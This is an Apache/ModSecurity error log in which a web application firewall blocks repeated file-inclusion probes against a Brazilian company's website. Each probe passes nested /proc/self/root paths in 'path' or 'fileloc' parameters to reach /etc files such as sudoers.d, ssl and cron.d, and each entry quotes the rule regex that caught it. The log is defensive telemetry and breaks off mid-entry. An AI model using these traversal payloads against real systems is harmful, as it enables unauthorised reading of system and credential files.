[Wed Mar 18 13:59:19.373193 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.241.31:42556] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrZ5_u8EFLIOrSqIpsjUQAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:00:55.043948 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.241.31:42536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraR-w_le52K8_3pV3-ygAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:00:56.312684 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.241.31:40900] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraSCmAPhZkrhU8w4mOrQAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:00:57.527155 2026] [:error] [pid 17653:tid 140411607643904] [client 74.7.241.31:45732] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraScdf6f5d65gmYZT2XgAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:00:58.799167 2026] [:error] [pid 29882:tid 140411699963648] [client 74.7.241.31:45748] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraSkzinOy1jxa1j4c6AAAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:00.275536 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:45762] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraTMdf6f5d65gmYZT2YQAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:01.631721 2026] [:error] [pid 15051:tid 140411674785536] [client 74.7.241.31:45768] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraTSmAPhZkrhU8w4mOsgAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:03.335695 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:45776] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraT9a6ubjKNq_cu4a_wQAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:06.919820 2026] [:error] [pid 14269:tid 140411574073088] [client 74.7.241.31:45784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraUgbLMZ6AikZjR9XhDwAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:07.317963 2026] [mime_magic:error] [pid 26799:tid 140411565680384] (70014)End of file found: [client 57.141.18.118:60846] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 14:01:08.670383 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.241.31:39904] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraVOyqAr6etmhZHNrpDQAAAEc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:09.965402 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.241.31:39916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraVQkwaGbbGflqUZAyZAAAANE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:11.290177 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:39926] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraV9a6ubjKNq_cu4a_xAAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:12.615631 2026] [:error] [pid 29882:tid 140411683178240] [client 74.7.241.31:39928] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraWEzinOy1jxa1j4c6DwAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:13.971737 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.241.31:39940] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraWQbLMZ6AikZjR9XhEgAAAAk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:15.290489 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:39954] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraW0zinOy1jxa1j4c6EgAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:16.631942 2026] [:error] [pid 14269:tid 140411590858496] [client 74.7.241.31:39966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraXAbLMZ6AikZjR9XhEwAAABI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:18.557375 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:49504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraXda6ubjKNq_cu4a_ywAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:19.928912 2026] [:error] [pid 15051:tid 140411582465792] [client 74.7.241.31:49508] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraXymAPhZkrhU8w4mOuQAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:21.253682 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.241.31:49518] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraYUzinOy1jxa1j4c6HQAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:22.558962 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.241.31:49526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraYkzinOy1jxa1j4c6IgAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:25.251872 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:49538] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abraYwkwaGbbGflqUZAycwAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:01:27.646962 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.241.31:49554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag 